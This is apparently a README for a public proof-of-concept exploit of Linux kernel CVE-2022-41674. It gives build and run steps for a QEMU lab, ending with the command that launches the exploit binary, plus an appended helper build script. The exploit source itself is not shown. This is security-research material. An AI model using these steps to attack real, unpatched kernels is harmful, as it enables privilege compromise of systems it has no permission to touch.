Extension of beacown research.
Complete proof-of-concept exploit for CVE-2022-41674 targeting the Linux kernel v5.12-rc4 and v5.14.
To run the exploit against a target system, you will need to build:
- Linux kernel.
- Exploit binary.
- QEMU disk image.
The instructions below have been tested on a WSL2 Ubuntu 20.04 host system.
Install system dependencies on a host system that will compile the kernel:
# apt install libelf-dev libssl-dev -y
Clone and build the Linux kernel with the target configuration (the .config shipped in this repository):
$ git clone --branch v5.12-rc4 git://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git
$ cp .config linux
$ cd linux
$ make -j `nproc`
Install system dependencies for compiling xpl.c:
# apt install libnl-3-200 libnl-genl-3-dev
xpl.c relies on libpcap version 1.10.1 or newer, so we will need to compile libpcap from source (note the cd into the cloned tree before checking out the tag, and that make install needs root):
$ git clone https://github.com/the-tcpdump-group/libpcap.git
$ cd libpcap
$ git checkout libpcap-1.10.1
$ ./configure
$ make
# make install
Copy the freshly built library (from the libpcap build directory) into the system library load path and create the soname symlink:
# cp ./libpcap.so.1.10.1 /usr/lib/x86_64-linux-gnu/ && ln -s /usr/lib/x86_64-linux-gnu/libpcap.so.1.10.1 /usr/lib/x86_64-linux-gnu/libpcap.so.1
Compile the xpl binary:
$ gcc -o xpl xpl.c $(pkg-config --cflags --libs libnl-3.0 libnl-genl-3.0 libpcap)
A modified version of the syzkaller ./create-image.sh script is used to prepare the target system and copy the xpl binary and the associated poc.pcap files into it.
Run ./create-image.sh with sudo; it produces a stretch.img output file that is consumed by the ./run.sh script.
The target kernel and system can be run using the ./run.sh script.
Ensure the path to the compiled kernel bzImage file is correct for your local host system.
The kernel must be built with CONFIG_MAC80211_HWSIM enabled; check for CONFIG_MAC80211_HWSIM=y in the .config before building, since a kernel without it will not expose the wlan0 interface the exploit drives.
CAP_NET_ADMIN is required. ./create-image.sh grants it artificially by making /sbin/iw setuid root and giving /xpl the capability with setcap.
Then, inside the guest, trigger a scan and run the exploit against the two captures:
$ /sbin/iw wlan0 scan trigger && /xpl /poc.pcap /poc2.pcap
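The build steps above, collected into one script with the preflight checks a practitioner would want before spending an hour compiling a kernel: does the .config actually enable CONFIG_MAC80211_HWSIM (and the CONFIG_MAC80211/CONFIG_CFG80211 it depends on), and is the libpcap that pkg-config sees already at least 1.10.1. This is an added example, not a script from the repository; the function names (kconfig_has, version_ge, check_kernel_config, build_kernel, build_libpcap, build_xpl) and the KERNEL_DIR/KERNEL_TAG/LIBPCAP_TAG variables are this example's own, and it assumes .config, xpl.c, create-image.sh and run.sh sit in the current directory as described above.

```shell
#!/bin/sh
# Added example (not part of the original repository): preflight checks plus
# a build helper for the README procedure. Running "sh build.sh build"
# performs the build; sourcing the file only defines the functions.
# Assumes .config, xpl.c, create-image.sh and run.sh are in the current dir.

KERNEL_TAG="${KERNEL_TAG:-v5.12-rc4}"       # or v5.14, the other tested target
KERNEL_DIR="${KERNEL_DIR:-linux}"
LIBPCAP_TAG="${LIBPCAP_TAG:-libpcap-1.10.1}"
MIN_PCAP="1.10.1"                           # xpl.c needs libpcap >= 1.10.1

# kconfig_has FILE OPTION: true if FILE sets OPTION to y (built-in) or m (module).
kconfig_has() {
    grep -qE "^$2=(y|m)$" "$1"
}

# check_kernel_config FILE: verify every option the PoC depends on.
# mac80211_hwsim needs mac80211, which in turn needs cfg80211. The exit
# status is the number of missing options, so 0 means the config is usable.
check_kernel_config() {
    missing=0
    for opt in CONFIG_CFG80211 CONFIG_MAC80211 CONFIG_MAC80211_HWSIM; do
        if ! kconfig_has "$1" "$opt"; then
            echo "missing in $1: $opt" >&2
            missing=$((missing + 1))
        fi
    done
    return "$missing"
}

# version_ge A B: true if dotted version A is >= B, comparing each component
# numerically (so 1.10.1 > 1.9.1, which a plain string compare gets wrong).
version_ge() {
    lowest=$(printf '%s\n%s\n' "$1" "$2" | sort -t. -k1,1n -k2,2n -k3,3n | head -n1)
    [ "$lowest" = "$2" ]
}

# pcap_installed_ok: true if the libpcap visible to pkg-config is new enough.
pcap_installed_ok() {
    v=$(pkg-config --modversion libpcap 2>/dev/null) || return 1
    version_ge "$v" "$MIN_PCAP"
}

build_kernel() {
    check_kernel_config .config || return 1
    [ -d "$KERNEL_DIR" ] || git clone --branch "$KERNEL_TAG" --depth 1 \
        git://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git "$KERNEL_DIR"
    cp .config "$KERNEL_DIR"/
    make -C "$KERNEL_DIR" -j"$(nproc)"
}

build_libpcap() {
    pcap_installed_ok && return 0       # skip the source build if the system copy suffices
    [ -d libpcap ] || git clone https://github.com/the-tcpdump-group/libpcap.git
    (cd libpcap && git checkout "$LIBPCAP_TAG" && ./configure && make && sudo make install)
    # Same placement as the README: drop the .so on the default loader path
    # and provide the libpcap.so.1 soname that the xpl binary links against.
    sudo cp libpcap/libpcap.so.1.10.1 /usr/lib/x86_64-linux-gnu/
    sudo ln -sf /usr/lib/x86_64-linux-gnu/libpcap.so.1.10.1 /usr/lib/x86_64-linux-gnu/libpcap.so.1
    pcap_installed_ok
}

build_xpl() {
    gcc -o xpl xpl.c $(pkg-config --cflags --libs libnl-3.0 libnl-genl-3.0 libpcap)
}

if [ "${1:-}" = "build" ]; then
    set -e
    build_kernel && build_libpcap && build_xpl
    sudo ./create-image.sh           # produces stretch.img with /xpl and the poc*.pcap files
    echo "next: check the bzImage path in run.sh, then ./run.sh"
fi
```

The capability setup (setuid /sbin/iw, setcap on /xpl) is left to create-image.sh as in the README; this script only checks that the inputs to that image are right before it is built.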